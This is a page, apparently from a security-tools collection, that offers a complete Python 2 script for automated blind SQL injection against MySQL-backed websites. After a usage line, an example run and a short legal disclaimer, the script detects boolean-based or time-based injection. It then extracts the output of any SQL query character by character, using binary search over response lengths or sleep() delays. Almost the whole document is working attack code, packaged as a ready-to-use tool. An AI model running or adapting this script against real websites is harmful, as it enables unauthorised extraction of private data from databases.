
SQL injection/mysqli-blindutils/sqli-slee.py

This script uses time-based and boolean-based blind SQL injection to obtain the desired information from a MySQL database.

Info

The syntax of this script is:

 python bsqli.py -u [url] -i [injection]

Example

 python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

The end-user is liable for his or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python2.7
 
import sys,re,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
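def request(URL):
    """Fetch URL with a GET and return the byte length of the response body.

    A fixed browser-like User-Agent header is sent with every request.
    On an HTTP error status or a connection failure the problem is
    printed and the process exits with status 1, so callers never see
    an exception from here. The response object is closed once it has
    been read (the original left it open until garbage collection).
    """
    user_agent = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
    }
    req = urllib2.Request(URL, None, user_agent)

    try:
        response = urllib2.urlopen(req)

    # HTTPError is a subclass of URLError, so it must be caught first to
    # keep the more specific "error code" message.
    except HTTPError as e:
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)

    except URLError as e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)

    try:
        return len(response.read())
    finally:
        # release the underlying socket deterministically; the caller only
        # needs the length, never the response object itself
        response.close()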
 
def value(URL):
    """Recover one byte of the injected expression through the is_what() oracle.

    Runs at most nine rounds of a binary search over 0..255, asking the
    sibling is_what() (which reads the module global sqli_type) whether
    the hidden byte is above, below or equal to the current guess.
    Returns chr(maybe) as soon as the '=' probe is true, or the string
    'done' when nine rounds pass without an exact match -- the caller
    treats 'done' as end-of-data.
    """
    target = 0  # assigned but never read
    end = 0  # round counter; the loop stops when it reaches 9
    next_maybe = 0
    floor = 0
    ceiling = 255
    maybe = int(ceiling)/2  # 127 under the Python 2 integer division this script targets

    while(end != 9):
        if(is_what(URL, maybe, '>')):	
            # byte is above the guess: raise the floor, move up half the remaining gap
            floor = maybe
            next_maybe = int(maybe + ((ceiling - floor)/2))

        elif(is_what(URL, maybe, '<')):
            # byte is below the guess: lower the ceiling, move down half the remaining gap
            ceiling = maybe
            next_maybe = int(maybe - ((ceiling - floor)/2))

        elif(is_what(URL, maybe, '=')):
            return chr(maybe)

        # NOTE(review): when none of the three probes is true (is_what()
        # returns None for any sqli_type other than 'boolean'/'time'),
        # next_maybe keeps its previous value and the same guess is
        # retried until the round counter runs out.
        maybe = next_maybe
        end += 1

    return 'done'
 
def is_what(URL, maybe, op):
    """Answer whether the hidden byte satisfies "<byte> op maybe" via the blind oracle.

    Reads two module globals: sqli_type (set by main()) selects the probe
    style, and TrueResponse (set by vuln_check()) is the response length
    that means "true" in boolean mode. Boolean mode compares the length of
    the probe response with TrueResponse; time mode treats a round trip
    longer than two seconds as "true". Returns 1 for true, 0 for false,
    and None when sqli_type is neither 'boolean' nor 'time'.
    """
    probe = str(URL) + str(op) + str(maybe)

    if sqli_type == 'boolean':
        observed = int(request(probe + '--+'))
        return 1 if TrueResponse == observed else 0

    if sqli_type == 'time':
        started = time.time()
        request(probe + ')*2)--+')
        return 1 if (time.time() - started) > 2 else 0
 
def vuln_check(URL):
    """Probe the target once for boolean-based, then time-based, blind injection.

    Sends two requests that differ only in a true ("43 like 43") versus
    false ("34 like 43") comparison and stores the "true" response length
    in the module global TrueResponse for is_what() to use later. If the
    two lengths differ, 'boolean' is returned; otherwise a sleep(5) probe
    is timed and 'time' is returned when the round trip exceeds five
    seconds. Exits the process with status 1 when neither test fires.
    """
    print('[+] Checking site...')

    global TrueResponse
    TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
    false_length = int(request(URL + '%20AND%2034%20like%2043--+'))

    if TrueResponse != false_length:
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'

    # lengths matched, so fall back to measuring a delay instead
    started = time.time()
    request(URL + '%20and%20sleep(5)--+')
    took = time.time() - started

    if took > 5:
        print('[+] Site seems to be vulnerable to time based blind SQL injection.')
        return 'time'

    print('[!] Seems like site isnt vulnerable to blind SQL injection.')
    sys.exit(1)
 
def main():
    """Parse -u/-i, classify the injection style, then collect the result byte by byte.

    Exits with status 1 when either option is missing. Stores the result of
    vuln_check() in the module global sqli_type so that is_what() can pick
    its probe style, then calls value() for positions 1, 2, ... until it
    returns 'done' and prints the characters gathered (or a hint when
    nothing was gathered).
    """
    print('''
                Auto BSQLi tool for MySQL
                ''')

    parser = OptionParser(usage='usage: %prog -u <target> -i <injection>')
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
    options, _ = parser.parse_args()

    if not (options.URL and options.INJECTION):
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)

    URL = options.URL
    INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))

    global sqli_type
    sqli_type = vuln_check(URL)
    print('[+] Dumping data...')

    # The per-byte URL only varies in the substring position, so build the
    # fixed head once for the detected injection style.
    if sqli_type == 'boolean':
        head = URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20'
    elif sqli_type == 'time':
        head = URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20'
    tail = '%20for%201))'

    collected = []
    position = 1
    while True:
        letter = value(head + str(position) + tail)
        if letter == 'done':
            break
        collected.append(letter)
        position += 1

    dump = ''.join(collected)
    if dump:
        print('[+] Data: ' + dump)
    else:
        print('[!] No data dumped. Check your injection.')
 
if __name__ == "__main__":  # script entry point; main() reads its options from sys.argv
    main()